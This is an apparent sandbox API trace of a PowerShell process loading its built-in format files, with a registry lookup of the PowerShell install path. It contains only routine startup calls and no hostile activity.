	[0318.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] SetErrorMode (uMode=0x1) returned 0x1
	[0318.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0318.255] SetErrorMode (uMode=0x1) returned 0x1
	[0318.255] SetErrorMode (uMode=0x1) returned 0x1
	[0318.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0318.255] SetErrorMode (uMode=0x1) returned 0x1
	[0318.255] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0318.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.255] CoTaskMemFree (pv=0x3d2890) 
	[0318.258] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0318.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.258] CoTaskMemFree (pv=0x3d2890) 
	[0318.258] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0318.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.258] CoTaskMemFree (pv=0x3d2890) 
	[0318.540] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0318.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.540] CoTaskMemFree (pv=0x3d2890) 
	[0318.540] SetErrorMode (uMode=0x1) returned 0x1
	[0318.540] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.540] GetFileType (hFile=0x304) returned 0x1
	[0318.540] SetErrorMode (uMode=0x1) returned 0x1
	[0318.540] GetFileType (hFile=0x304) returned 0x1
	[0318.541] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.542] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.542] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.542] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.543] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.543] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.543] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x9e2, lpOverlapped=0x0) returned 1
	[0318.543] ReadFile (in: hFile=0x304, lpBuffer=0x335aba2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335aba2*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.543] ReadFile (in: hFile=0x304, lpBuffer=0x335b658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x335b658*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.543] SetErrorMode (uMode=0x1) returned 0x1
	[0318.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0318.543] SetErrorMode (uMode=0x1) returned 0x1
	[0318.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x304) returned 0x0
	[0318.544] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0318.544] CoTaskMemAlloc (cb=0x5a) returned 0x1b409820
	[0318.544] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x1b409820, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0318.544] CoTaskMemFree (pv=0x1b409820) 
	[0318.544] RegCloseKey (hKey=0x304) returned 0x0
	[0318.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.547] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc7aef1b1, Data2=0x1c41, Data3=0x4bc7, Data4=([0]=0x8d, [1]=0x79, [2]=0xe, [3]=0xe2, [4]=0xfb, [5]=0x22, [6]=0x87, [7]=0x98))) returned 0x0
	[0318.549] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xe5405f97, Data2=0xb84b, Data3=0x4d0e, Data4=([0]=0x9c, [1]=0xb0, [2]=0x21, [3]=0x10, [4]=0xf7, [5]=0x16, [6]=0xb7, [7]=0xb3))) returned 0x0
	[0318.551] SetErrorMode (uMode=0x1) returned 0x1
	[0318.551] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.551] GetFileType (hFile=0x304) returned 0x1
	[0318.551] SetErrorMode (uMode=0x1) returned 0x1
	[0318.551] GetFileType (hFile=0x304) returned 0x1
	[0318.551] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.552] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.552] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.553] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.553] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.554] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0xfb2, lpOverlapped=0x0) returned 1
	[0318.554] ReadFile (in: hFile=0x304, lpBuffer=0x33858da, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33858da*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.554] ReadFile (in: hFile=0x304, lpBuffer=0x33861c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33861c0*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.554] CloseHandle (hObject=0x304) returned 1
	[0318.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0318.554] SetErrorMode (uMode=0x1) returned 0x1
	[0318.554] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0318.554] SetErrorMode (uMode=0x1) returned 0x1
	[0318.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0318.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x304) returned 0x0
	[0318.555] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0318.555] CoTaskMemAlloc (cb=0x5a) returned 0x1b4095f0
	[0318.555] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x1b4095f0, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0318.555] CoTaskMemFree (pv=0x1b4095f0) 
	[0318.555] RegCloseKey (hKey=0x304) returned 0x0
	[0318.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0318.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0318.557] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xbbcffe3c, Data2=0x381e, Data3=0x404a, Data4=([0]=0x9e, [1]=0xed, [2]=0xf6, [3]=0x73, [4]=0x72, [5]=0x42, [6]=0x24, [7]=0x78))) returned 0x0
	[0318.558] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xe3da1280, Data2=0xcb34, Data3=0x4d79, Data4=([0]=0x9e, [1]=0xb1, [2]=0xbd, [3]=0xe3, [4]=0x26, [5]=0x56, [6]=0x2d, [7]=0x1d))) returned 0x0
	[0318.558] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x2a12e672, Data2=0xc20e, Data3=0x45a4, Data4=([0]=0xbe, [1]=0xb4, [2]=0x85, [3]=0xbc, [4]=0xbc, [5]=0x59, [6]=0xc7, [7]=0x23))) returned 0x0
	[0318.558] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa3a2cdd5, Data2=0x705, Data3=0x4fbf, Data4=([0]=0x96, [1]=0xc4, [2]=0xb9, [3]=0x7, [4]=0x2c, [5]=0xf5, [6]=0x9, [7]=0xe2))) returned 0x0
	[0318.558] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xcad2d70, Data2=0x1c32, Data3=0x40f2, Data4=([0]=0xa1, [1]=0x95, [2]=0x60, [3]=0x65, [4]=0x21, [5]=0x64, [6]=0xc9, [7]=0x69))) returned 0x0
	[0318.559] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x664def15, Data2=0x2fb9, Data3=0x4956, Data4=([0]=0xa9, [1]=0x23, [2]=0xc4, [3]=0xcd, [4]=0xef, [5]=0xad, [6]=0x29, [7]=0xfc))) returned 0x0
	[0318.559] SetErrorMode (uMode=0x1) returned 0x1
	[0318.559] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.559] GetFileType (hFile=0x304) returned 0x1
	[0318.559] SetErrorMode (uMode=0x1) returned 0x1
	[0318.559] GetFileType (hFile=0x304) returned 0x1
	[0318.559] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.560] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.561] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.561] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.562] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.562] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0318.562] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0xaca, lpOverlapped=0x0) returned 1
	[0318.562] ReadFile (in: hFile=0x304, lpBuffer=0x33d1552, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1552*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.562] ReadFile (in: hFile=0x304, lpBuffer=0x33d1f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x33d1f20*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0318.562] CloseHandle (hObject=0x304) returned 1
	[0318.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.562] SetErrorMode (uMode=0x1) returned 0x1
	[0318.563] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0318.563] SetErrorMode (uMode=0x1) returned 0x1
	[0318.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.563] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x304) returned 0x0
	[0318.563] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0318.563] CoTaskMemAlloc (cb=0x5a) returned 0x1b4095f0
	[0318.563] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x1b4095f0, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0318.563] CoTaskMemFree (pv=0x1b4095f0) 
	[0318.563] RegCloseKey (hKey=0x304) returned 0x0
	[0318.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0318.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
